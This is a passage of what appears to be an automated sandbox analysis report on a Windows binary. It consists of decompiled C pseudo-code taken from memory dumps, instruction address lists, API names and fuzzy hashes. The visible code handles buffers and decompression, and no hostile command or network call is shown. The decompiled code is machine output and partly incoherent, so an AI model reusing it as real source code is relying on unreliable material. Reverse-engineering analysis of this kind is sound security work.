                                                                            																		_push(6);
                                                                            																		E00196BF5(__eflags);
                                                                            																		E00196E03(0x1d00e0, 0xb);
                                                                            																		__eflags = 0;
                                                                            																		 *(_t706 + 0xf) = 0;
                                                                            																		goto L73;
                                                                            																	}
                                                                            																	_push(0x7d);
                                                                            																	E00196BF5(__eflags);
                                                                            																	E0019E797( *(_t683 + 8) + 0x5024);
                                                                            																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                                                                            																	_t141 = _t706 - 0x13c; // 0x6c4
                                                                            																	L0019E724(_t141);
                                                                            																}
                                                                            															}
                                                                            															E00196E03(0x1d00e0, 2);
                                                                            															_t543 = E00191E3B(_t574);
                                                                            															__eflags =  *((char*)(_t574 + 0x6cb4));
                                                                            															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
                                                                            															goto L16;
                                                                            														}
                                                                            														_t100 = _t706 - 0x2198; // -6552
                                                                            														_t545 = E00197BBB(_t100, _t574 + 0x32c0);
                                                                            														__eflags = _t545;
                                                                            														if(_t545 == 0) {
                                                                            															goto L61;
                                                                            														}
                                                                            														__eflags =  *((char*)(_t706 - 0x219c));
                                                                            														if( *((char*)(_t706 - 0x219c)) == 0) {
                                                                            															L59:
                                                                            															 *(_t706 + 0xf) = 0;
                                                                            															goto L61;
                                                                            														}
                                                                            														_t102 = _t706 - 0x2198; // -6552
                                                                            														_t547 = E00197B9D(_t102, _t683);
                                                                            														__eflags = _t547;
                                                                            														if(_t547 == 0) {
                                                                            															goto L61;
                                                                            														}
                                                                            														goto L59;
                                                                            													}
                                                                            													__eflags = _t692 - _t668;
                                                                            													if(_t692 != _t668) {
                                                                            														goto L61;
                                                                            													}
                                                                            													goto L55;
                                                                            												}
                                                                            												__eflags =  *((char*)(_t398 + 0x6154));
                                                                            												if( *((char*)(_t398 + 0x6154)) == 0) {
                                                                            													goto L61;
                                                                            												}
                                                                            												goto L53;
                                                                            											}
                                                                            											__eflags =  *(_t683 + 0x10f6);
                                                                            											if( *(_t683 + 0x10f6) == 0) {
                                                                            												goto L50;
                                                                            											}
                                                                            											 *(_t706 + 0xf) = 1;
                                                                            											__eflags =  *(_t574 + 0x3318);
                                                                            											if( *(_t574 + 0x3318) == 0) {
                                                                            												goto L51;
                                                                            											}
                                                                            											goto L50;
                                                                            										}
                                                                            										__eflags = _t692 - _t387;
                                                                            										_t388 = 1;
                                                                            										if(_t692 != _t387) {
                                                                            											goto L46;
                                                                            										}
                                                                            										goto L45;
                                                                            									}
                                                                            									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
                                                                            									 *(_t706 + 0xb) = _t671;
                                                                            									 *(_t706 + 0xc) = _t671;
                                                                            									__eflags = _t671;
                                                                            									if(_t671 == 0) {
                                                                            										goto L214;
                                                                            									} else {
                                                                            										_t667 = 0;
                                                                            										__eflags = 0;
                                                                            										goto L43;
                                                                            									}
                                                                            								}
                                                                            								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
                                                                            								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
                                                                            									goto L29;
                                                                            								}
                                                                            								__eflags =  *((char*)(_t683 + 0xf1));
                                                                            								if( *((char*)(_t683 + 0xf1)) != 0) {
                                                                            									goto L219;
                                                                            								}
                                                                            								goto L29;
                                                                            							}
                                                                            							if(__eflags < 0) {
                                                                            								L25:
                                                                            								 *(_t574 + 0x32e0) = _t665;
                                                                            								 *(_t574 + 0x32e4) = _t665;
                                                                            								goto L26;
                                                                            							}
                                                                            							__eflags =  *(_t574 + 0x32e0) - _t665;
                                                                            							if( *(_t574 + 0x32e0) >= _t665) {
                                                                            								goto L26;
                                                                            							}
                                                                            							goto L25;
                                                                            						}
                                                                            						if(__eflags < 0) {
                                                                            							L21:
                                                                            							 *(_t574 + 0x32d8) = _t665;
                                                                            							 *(_t574 + 0x32dc) = _t665;
                                                                            							goto L22;
                                                                            						}
                                                                            						__eflags =  *(_t574 + 0x32d8) - _t665;
                                                                            						if( *(_t574 + 0x32d8) >= _t665) {
                                                                            							goto L22;
                                                                            						}
                                                                            						goto L21;
                                                                            					}
                                                                            					__eflags = _t690 - 3;
                                                                            					if(_t690 != 3) {
                                                                            						L10:
                                                                            						__eflags = _t690 - 5;
                                                                            						if(_t690 != 5) {
                                                                            							goto L217;
                                                                            						}
                                                                            						__eflags =  *((char*)(_t574 + 0x45ac));
                                                                            						if( *((char*)(_t574 + 0x45ac)) == 0) {
                                                                            							goto L219;
                                                                            						}
                                                                            						_push( *(_t706 - 0x18));
                                                                            						_push(0);
                                                                            						_push(_t683 + 0x10);
                                                                            						_push(_t574);
                                                                            						_t564 = E001A80D0(_t665);
                                                                            						__eflags = _t564;
                                                                            						if(_t564 != 0) {
                                                                            							__eflags = 0;
                                                                            							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
                                                                            							goto L15;
                                                                            						} else {
                                                                            							E00196E03(0x1d00e0, 1);
                                                                            							goto L219;
                                                                            						}
                                                                            					}
                                                                            					__eflags =  *(_t683 + 0x10f5);
                                                                            					if( *(_t683 + 0x10f5) == 0) {
                                                                            						goto L217;
                                                                            					} else {
                                                                            						E001979A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
                                                                            						goto L10;
                                                                            					}
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
                                                                            					L4:
                                                                            					_t393 = 0;
                                                                            					goto L17;
                                                                            				}
                                                                            				_push(_t370);
                                                                            				_push(0);
                                                                            				_push(_t683 + 0x10);
                                                                            				_push(_t574);
                                                                            				if(E001A80D0(0) != 0) {
                                                                            					_t665 = 0;
                                                                            					__eflags = 0;
                                                                            					goto L6;
                                                                            				} else {
                                                                            					E00196E03(0x1d00e0, 1);
                                                                            					goto L4;
                                                                            				}
                                                                            			}
                                                                            0x001987c7
                                                                            0x001987d0
                                                                            0x001987d3
                                                                            0x001987df
                                                                            0x001987f2
                                                                            0x001987fc
                                                                            0x0019880e
                                                                            0x00198813
                                                                            0x0019881a
                                                                            0x001988b0
                                                                            0x001988b0
                                                                            0x001988b4
                                                                            0x001988ba
                                                                            0x001988bf
                                                                            0x001988c5
                                                                            0x001988ca
                                                                            0x001988d0
                                                                            0x001988d7
                                                                            0x001988dc
                                                                            0x001988dd
                                                                            0x001988df
                                                                            0x00198972
                                                                            0x00198974
                                                                            0x00198979
                                                                            0x0019897b
                                                                            0x001989cd
                                                                            0x001989d0
                                                                            0x001989d2
                                                                            0x001989f6
                                                                            0x001989f9
                                                                            0x001989f9
                                                                            0x00198a00
                                                                            0x00198a38
                                                                            0x00198a3a
                                                                            0x00198ff7
                                                                            0x00198ff7
                                                                            0x00198ffb
                                                                            0x00199001
                                                                            0x00199006
                                                                            0x0019900a
                                                                            0x0019900d
                                                                            0x00199010
                                                                            0x00199012
                                                                            0x00199012
                                                                            0x00199012
                                                                            0x00199012
                                                                            0x00199018
                                                                            0x00199018
                                                                            0x0019901c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019901e
                                                                            0x00199020
                                                                            0x001984a0
                                                                            0x001984a0
                                                                            0x00000000
                                                                            0x001984a0
                                                                            0x00199026
                                                                            0x0019902c
                                                                            0x0019903a
                                                                            0x0019903c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019903c
                                                                            0x0019902e
                                                                            0x00199030
                                                                            0x00000000
                                                                            0x00199030
                                                                            0x00198a40
                                                                            0x00198a40
                                                                            0x00198a43
                                                                            0x00198a4a
                                                                            0x00198a5c
                                                                            0x00198a5c
                                                                            0x00198a5f
                                                                            0x00198a61
                                                                            0x00198aa8
                                                                            0x00198aa8
                                                                            0x00198aac
                                                                            0x00198aae
                                                                            0x00198ab6
                                                                            0x00198ab6
                                                                            0x00198aca
                                                                            0x00198ad0
                                                                            0x00198ad6
                                                                            0x00198adc
                                                                            0x00198aed
                                                                            0x00198b03
                                                                            0x00198b0e
                                                                            0x00198b17
                                                                            0x00198b1a
                                                                            0x00198b21
                                                                            0x00198b27
                                                                            0x00198b2c
                                                                            0x00198b2f
                                                                            0x00198b31
                                                                            0x00198b34
                                                                            0x00198b37
                                                                            0x00198b3a
                                                                            0x00198b3d
                                                                            0x00198b40
                                                                            0x00198b42
                                                                            0x00198be5
                                                                            0x00198be5
                                                                            0x00198be8
                                                                            0x00198bef
                                                                            0x00198bf6
                                                                            0x00198bfa
                                                                            0x00198c10
                                                                            0x00198c12
                                                                            0x00198c12
                                                                            0x00198c13
                                                                            0x00198c13
                                                                            0x00198c17
                                                                            0x00198c1a
                                                                            0x00198c1d
                                                                            0x00198c20
                                                                            0x00198d2c
                                                                            0x00198d33
                                                                            0x00198d35
                                                                            0x00198d3c
                                                                            0x00198d66
                                                                            0x00198d6b
                                                                            0x00198d7d
                                                                            0x00198d83
                                                                            0x00198d85
                                                                            0x00198d8b
                                                                            0x00198da5
                                                                            0x00198d3e
                                                                            0x00198d3e
                                                                            0x00198d44
                                                                            0x00198d4a
                                                                            0x00198d4b
                                                                            0x00198d4b
                                                                            0x00198d3c
                                                                            0x00198daa
                                                                            0x00198dac
                                                                            0x00198db1
                                                                            0x00198db8
                                                                            0x00198dea
                                                                            0x00198dea
                                                                            0x00198dea
                                                                            0x00198dec
                                                                            0x00198dee
                                                                            0x00198dee
                                                                            0x00198df5
                                                                            0x00198dff
                                                                            0x00198e06
                                                                            0x00198e25
                                                                            0x00198e25
                                                                            0x00198e29
                                                                            0x00198e2c
                                                                            0x00198e8d
                                                                            0x00198e8d
                                                                            0x00198e91
                                                                            0x00198e94
                                                                            0x00198ea7
                                                                            0x00198ea7
                                                                            0x00198ea7
                                                                            0x00198ea9
                                                                            0x00198ea9
                                                                            0x00198ead
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198eb3
                                                                            0x00198eb6
                                                                            0x00198eba
                                                                            0x00198ec6
                                                                            0x00198ec6
                                                                            0x00198eca
                                                                            0x00198ee5
                                                                            0x00198ee5
                                                                            0x00198ee7
                                                                            0x00198efc
                                                                            0x00198efc
                                                                            0x00198efe
                                                                            0x00198fc2
                                                                            0x00198fc2
                                                                            0x00198fc5
                                                                            0x00198fcc
                                                                            0x00198fd4
                                                                            0x00198fdb
                                                                            0x00198fe0
                                                                            0x00198fe2
                                                                            0x00198feb
                                                                            0x00198feb
                                                                            0x00198fe2
                                                                            0x00198ff0
                                                                            0x00000000
                                                                            0x00198ff0
                                                                            0x00198f04
                                                                            0x00198f09
                                                                            0x00198f0b
                                                                            0x00198f0e
                                                                            0x00198f14
                                                                            0x00198f14
                                                                            0x00198f16
                                                                            0x00198f28
                                                                            0x00198f28
                                                                            0x00198f2e
                                                                            0x00198f33
                                                                            0x00198f3c
                                                                            0x00198f50
                                                                            0x00198f57
                                                                            0x00198f6a
                                                                            0x00198f6c
                                                                            0x00198f75
                                                                            0x00198f7a
                                                                            0x00198f80
                                                                            0x00198f8f
                                                                            0x00198fa2
                                                                            0x00198fb5
                                                                            0x00198fb7
                                                                            0x00198fba
                                                                            0x00198fbf
                                                                            0x00000000
                                                                            0x00198fbf
                                                                            0x00198f18
                                                                            0x00198f1e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198f20
                                                                            0x00198f26
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198f26
                                                                            0x00198f10
                                                                            0x00198f12
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198f12
                                                                            0x00198ee9
                                                                            0x00198eec
                                                                            0x00198ef3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198ef9
                                                                            0x00000000
                                                                            0x00198ef9
                                                                            0x00198ecc
                                                                            0x00198ece
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198ed0
                                                                            0x00198ed7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198edd
                                                                            0x00198edf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198edf
                                                                            0x00198ebc
                                                                            0x00198ec0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198ec0
                                                                            0x00198e96
                                                                            0x00198e9d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e9f
                                                                            0x00198ea1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198ea3
                                                                            0x00000000
                                                                            0x00198ea3
                                                                            0x00198e2e
                                                                            0x00198e32
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e34
                                                                            0x00198e36
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e38
                                                                            0x00198e3e
                                                                            0x00198e68
                                                                            0x00198e68
                                                                            0x00198e72
                                                                            0x00198e73
                                                                            0x00198e75
                                                                            0x00198e75
                                                                            0x00198e81
                                                                            0x00198e85
                                                                            0x00198e8a
                                                                            0x00000000
                                                                            0x00198e8a
                                                                            0x00198e40
                                                                            0x00198e46
                                                                            0x00198e50
                                                                            0x00198e50
                                                                            0x00198e57
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e59
                                                                            0x00198e63
                                                                            0x00198e64
                                                                            0x00000000
                                                                            0x00198e64
                                                                            0x00198e48
                                                                            0x00198e4e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e4e
                                                                            0x00198e08
                                                                            0x00198e0e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198e10
                                                                            0x00198e1a
                                                                            0x00198e1a
                                                                            0x00198e1c
                                                                            0x00198e1e
                                                                            0x00198e1e
                                                                            0x00198636
                                                                            0x0019863c
                                                                            0x0019863f
                                                                            0x00198642
                                                                            0x00198644
                                                                            0x00000000
                                                                            0x0019864a
                                                                            0x0019864a
                                                                            0x0019864a
                                                                            0x00000000
                                                                            0x0019864a
                                                                            0x00198644
                                                                            0x00198508
                                                                            0x0019850e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198510
                                                                            0x00198517
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198517
                                                                            0x001984e1
                                                                            0x001984eb
                                                                            0x001984eb
                                                                            0x001984f1
                                                                            0x00000000
                                                                            0x001984f1
                                                                            0x001984e3
                                                                            0x001984e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001984e9
                                                                            0x001984c3
                                                                            0x001984cd
                                                                            0x001984cd
                                                                            0x001984d3
                                                                            0x00000000
                                                                            0x001984d3
                                                                            0x001984c5
                                                                            0x001984cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001984cb
                                                                            0x0019842c
                                                                            0x0019842f
                                                                            0x0019844e
                                                                            0x0019844e
                                                                            0x00198451
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198457
                                                                            0x0019845e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00198469
                                                                            0x0019846a
                                                                            0x0019846e
                                                                            0x0019846f
                                                                            0x00198470
                                                                            0x00198475
                                                                            0x00198477
                                                                            0x0019848c
                                                                            0x0019849d
                                                                            0x00000000
                                                                            0x00198479
                                                                            0x00198480
                                                                            0x00000000
                                                                            0x00198480
                                                                            0x00198477
                                                                            0x00198431
                                                                            0x00198438
                                                                            0x00000000
                                                                            0x0019843e
                                                                            0x00198449
                                                                            0x00000000
                                                                            0x00198449
                                                                            0x00198438
                                                                            0x001983f5
                                                                            0x00198413
                                                                            0x00198413
                                                                            0x00000000
                                                                            0x00198413
                                                                            0x001983f7
                                                                            0x001983f8
                                                                            0x001983fc
                                                                            0x001983fd
                                                                            0x00198405
                                                                            0x0019841a
                                                                            0x0019841a
                                                                            0x00000000
                                                                            0x00198407
                                                                            0x0019840e
                                                                            0x00000000
                                                                            0x0019840e

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog_memcmp
                                                                            • String ID:
                                                                            • API String ID: 3004599000-0
                                                                            • Opcode ID: c6e6d3a3de0fb85a49b5765eca2de4ff25740e6bbc83ff5cb2c3ce119e3fa6e4
                                                                            • Instruction ID: f754168808f0512e50c06ec8daa3baa2d43713c7ddb6a9fa276b9f0125f816c3
                                                                            • Opcode Fuzzy Hash: c6e6d3a3de0fb85a49b5765eca2de4ff25740e6bbc83ff5cb2c3ce119e3fa6e4
                                                                            • Instruction Fuzzy Hash: 85821C71904185AEDF19DF64C895BFABBB9BF16300F0841BAEC599B143DF315A84C760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AE643() {
                                                                            				_Unknown_base(*)()* _t1;
                                                                            
                                                                            				_t1 = SetUnhandledExceptionFilter(E001AE64F); // executed
                                                                            				return _t1;
                                                                            			}




                                                                            0x001ae648
                                                                            0x001ae64e

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,001AE084), ref: 001AE648
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 6c22d2702937f0e9cf29ace3a4289f9c16a7fa5944862d3471c01fa50f01da59
                                                                            • Instruction ID: bd32469d906ce92b285c8856337a816e7e1816b7646a24e101d86dd9eb3939f9
                                                                            • Opcode Fuzzy Hash: 6c22d2702937f0e9cf29ace3a4289f9c16a7fa5944862d3471c01fa50f01da59
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E001A626D(signed int __ecx, void* __edx, void* __eflags) {
                                                                            				void* __ebp;
                                                                            				signed int _t161;
                                                                            				intOrPtr _t164;
                                                                            				signed int _t170;
                                                                            				signed int _t171;
                                                                            				signed int _t175;
                                                                            				signed int _t178;
                                                                            				void* _t181;
                                                                            				void* _t188;
                                                                            				signed int _t193;
                                                                            				signed int _t194;
                                                                            				signed int _t195;
                                                                            				signed int _t197;
                                                                            				signed int _t208;
                                                                            				signed int _t212;
                                                                            				intOrPtr _t213;
                                                                            				signed int _t216;
                                                                            				signed int _t219;
                                                                            				signed int _t223;
                                                                            				signed int _t225;
                                                                            				signed int _t226;
                                                                            				intOrPtr* _t232;
                                                                            				void* _t238;
                                                                            				signed int _t240;
                                                                            				signed int _t241;
                                                                            				intOrPtr _t245;
                                                                            				intOrPtr _t247;
                                                                            				signed int _t257;
                                                                            				intOrPtr* _t259;
                                                                            				signed int _t260;
                                                                            				signed int _t263;
                                                                            				intOrPtr* _t267;
                                                                            				intOrPtr _t268;
                                                                            				void* _t269;
                                                                            				signed int _t270;
                                                                            				void* _t272;
                                                                            				signed int _t273;
                                                                            				void* _t274;
                                                                            				void* _t276;
                                                                            
                                                                            				_t216 = __ecx; // executed
                                                                            				E001A2A7F(__ecx, __edx); // executed
                                                                            				E001A42D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
                                                                            				_t240 = 0;
                                                                            				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
                                                                            					_t238 = 0;
                                                                            					do {
                                                                            						_t213 =  *((intOrPtr*)(_t216 + 0x18));
                                                                            						_t238 = _t238 + 0x4ae4;
                                                                            						_t240 = _t240 + 1;
                                                                            						 *((char*)(_t213 + _t238 - 0x13)) = 0;
                                                                            						 *((char*)(_t213 + _t238 - 0x11)) = 0;
                                                                            					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
                                                                            				}
                                                                            				_t219 = 5;
                                                                            				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
                                                                            				E001AEA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
                                                                            				_t276 = _t274 + 0x18;
                                                                            				_t263 = 0;
                                                                            				 *(_t276 + 0x28) = 0;
                                                                            				_t268 = 0;
                                                                            				 *((char*)(_t276 + 0x13)) = 0;
                                                                            				 *((intOrPtr*)(_t276 + 0x18)) = 0;
                                                                            				 *((char*)(_t276 + 0x12)) = 0;
                                                                            				while(1) {
                                                                            					L4:
                                                                            					_push(0x00400000 - _t263 & 0xfffffff0);
                                                                            					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
                                                                            					_t161 = E0019C70F();
                                                                            					 *(_t276 + 0x2c) = _t161;
                                                                            					if(_t161 < 0) {
                                                                            						break;
                                                                            					}
                                                                            					_t263 = _t263 + _t161;
                                                                            					 *(_t276 + 0x20) = _t263;
                                                                            					if(_t263 != 0) {
                                                                            						if(_t161 <= 0) {
                                                                            							goto L56;
                                                                            						} else {
                                                                            							if(_t263 >= 0x400) {
                                                                            								L56:
                                                                            								while(_t268 < _t263) {
                                                                            									_t225 = 0;
                                                                            									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
                                                                            									 *(_t276 + 0x1c) = 0;
                                                                            									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
                                                                            									__eflags = _t170;
                                                                            									if(_t170 != 0) {
                                                                            										_t245 =  *((intOrPtr*)(_t276 + 0x18));
                                                                            										_t273 = 0;
                                                                            										__eflags = 0;
                                                                            										do {
                                                                            											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
                                                                            											 *(_t276 + 0x28) = _t225;
                                                                            											__eflags =  *((char*)(_t259 + 0x4ad3));
                                                                            											 *_t259 = _t216;
                                                                            											if( *((char*)(_t259 + 0x4ad3)) == 0) {
                                                                            												E0019A4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
                                                                            												_t263 =  *(_t276 + 0x20);
                                                                            												 *((intOrPtr*)(_t259 + 8)) = 0;
                                                                            												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
                                                                            												__eflags = _t170;
                                                                            												 *((intOrPtr*)(_t259 + 4)) = 0;
                                                                            												 *(_t259 + 0x4acc) = _t170;
                                                                            												if(_t170 != 0) {
                                                                            													 *((char*)(_t259 + 0x4ad0)) = 0;
                                                                            													 *((char*)(_t259 + 0x14)) = 0;
                                                                            													 *((char*)(_t259 + 0x2c)) = 0;
                                                                            													_t225 =  *(_t276 + 0x1c);
                                                                            													goto L15;
                                                                            												}
                                                                            											} else {
                                                                            												 *(_t259 + 0x4acc) = _t263;
                                                                            												L15:
                                                                            												__eflags =  *(_t276 + 0x2c);
                                                                            												 *((char*)(_t259 + 0x4ad3)) = 0;
                                                                            												 *(_t259 + 0x4ae0) = _t225;
                                                                            												__eflags =  *((char*)(_t259 + 0x14));
                                                                            												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
                                                                            												if( *((char*)(_t259 + 0x14)) != 0) {
                                                                            													L20:
                                                                            													__eflags =  *((char*)(_t276 + 0x13));
                                                                            													if( *((char*)(_t276 + 0x13)) != 0) {
                                                                            														L23:
                                                                            														 *((char*)(_t259 + 0x4ad1)) = 1;
                                                                            														 *((char*)(_t276 + 0x13)) = 1;
                                                                            													} else {
                                                                            														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
                                                                            														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
                                                                            															goto L23;
                                                                            														} else {
                                                                            															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
                                                                            														}
                                                                            													}
                                                                            													_t273 = _t273 + 0x4ae4;
                                                                            													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
                                                                            													_t225 = _t225 + 1;
                                                                            													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
                                                                            													_t208 = _t263 - _t245;
                                                                            													__eflags = _t208;
                                                                            													 *(_t276 + 0x1c) = _t225;
                                                                            													if(_t208 < 0) {
                                                                            														L26:
                                                                            														__eflags = _t208 - 0x400;
                                                                            														if(_t208 >= 0x400) {
                                                                            															goto L27;
                                                                            														}
                                                                            													} else {
                                                                            														__eflags =  *((char*)(_t259 + 0x28));
                                                                            														if( *((char*)(_t259 + 0x28)) == 0) {
                                                                            															goto L26;
                                                                            														}
                                                                            													}
                                                                            												} else {
                                                                            													 *((char*)(_t259 + 0x14)) = 1;
                                                                            													_push(_t259 + 0x18);
                                                                            													_push(_t259 + 4);
                                                                            													_t212 = E001A33D3(_t216);
                                                                            													__eflags = _t212;
                                                                            													if(_t212 == 0) {
                                                                            														L29:
                                                                            														 *((char*)(_t276 + 0x12)) = 1;
                                                                            													} else {
                                                                            														__eflags =  *((char*)(_t259 + 0x29));
                                                                            														if( *((char*)(_t259 + 0x29)) != 0) {
                                                                            															L19:
                                                                            															_t225 =  *(_t276 + 0x1c);
                                                                            															 *((char*)(_t216 + 0xe662)) = 1;
                                                                            															goto L20;
                                                                            														} else {
                                                                            															__eflags =  *((char*)(_t216 + 0xe662));
                                                                            															if( *((char*)(_t216 + 0xe662)) == 0) {
                                                                            																goto L29;
                                                                            															} else {
                                                                            																goto L19;
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											goto L30;
                                                                            											L27:
                                                                            											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
                                                                            											__eflags = _t225 - _t170;
                                                                            										} while (_t225 < _t170);
                                                                            									}
                                                                            									L30:
                                                                            									_t226 =  *(_t276 + 0x14);
                                                                            									_t171 = _t226;
                                                                            									_t257 = _t171 /  *(_t216 + 0x1c);
                                                                            									__eflags = _t171 %  *(_t216 + 0x1c);
                                                                            									if(_t171 %  *(_t216 + 0x1c) != 0) {
                                                                            										_t257 = _t257 + 1;
                                                                            										__eflags = _t257;
                                                                            									}
                                                                            									_t269 = 0;
                                                                            									__eflags = _t226;
                                                                            									if(_t226 != 0) {
                                                                            										_t247 = 0;
                                                                            										_t267 = _t276 + 0x34;
                                                                            										_t195 = _t257 * 0x4ae4;
                                                                            										__eflags = _t195;
                                                                            										 *((intOrPtr*)(_t276 + 0x24)) = 0;
                                                                            										 *(_t276 + 0x30) = _t195;
                                                                            										do {
                                                                            											_t232 = _t267;
                                                                            											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
                                                                            											_t197 =  *(_t276 + 0x14) - _t269;
                                                                            											_t267 = _t267 + 8;
                                                                            											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
                                                                            											__eflags = _t257 - _t197;
                                                                            											if(_t257 < _t197) {
                                                                            												_t197 = _t257;
                                                                            											}
                                                                            											__eflags =  *(_t276 + 0x1c) - 1;
                                                                            											 *(_t232 + 4) = _t197;
                                                                            											if( *(_t276 + 0x1c) != 1) {
                                                                            												E001A045D( *((intOrPtr*)(_t216 + 0x14)), E001A6CAC, _t232);
                                                                            											} else {
                                                                            												E001A66A2(_t216, _t248);
                                                                            											}
                                                                            											_t269 = _t269 + _t257;
                                                                            											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
                                                                            											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
                                                                            											__eflags = _t269 -  *(_t276 + 0x14);
                                                                            										} while (_t269 <  *(_t276 + 0x14));
                                                                            										_t263 =  *(_t276 + 0x20);
                                                                            									}
                                                                            									_t270 =  *(_t276 + 0x1c);
                                                                            									__eflags = _t270;
                                                                            									if(_t270 == 0) {
                                                                            										_t268 =  *((intOrPtr*)(_t276 + 0x18));
                                                                            										goto L68;
                                                                            									} else {
                                                                            										E001A0697( *((intOrPtr*)(_t216 + 0x14)));
                                                                            										 *(_t276 + 0x14) = 0;
                                                                            										__eflags = _t270;
                                                                            										if(_t270 == 0) {
                                                                            											L52:
                                                                            											_t175 =  *((intOrPtr*)(_t276 + 0x12));
                                                                            											goto L53;
                                                                            										} else {
                                                                            											_t260 = 0;
                                                                            											__eflags = 0;
                                                                            											do {
                                                                            												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
                                                                            												__eflags =  *((char*)(_t272 + 0x4ad1));
                                                                            												if( *((char*)(_t272 + 0x4ad1)) != 0) {
                                                                            													L47:
                                                                            													_t178 = E001A6CDB(_t216, _t272);
                                                                            													__eflags = _t178;
                                                                            													if(_t178 != 0) {
                                                                            														goto L48;
                                                                            													}
                                                                            												} else {
                                                                            													_t194 = E001A2E2C(_t216, _t272);
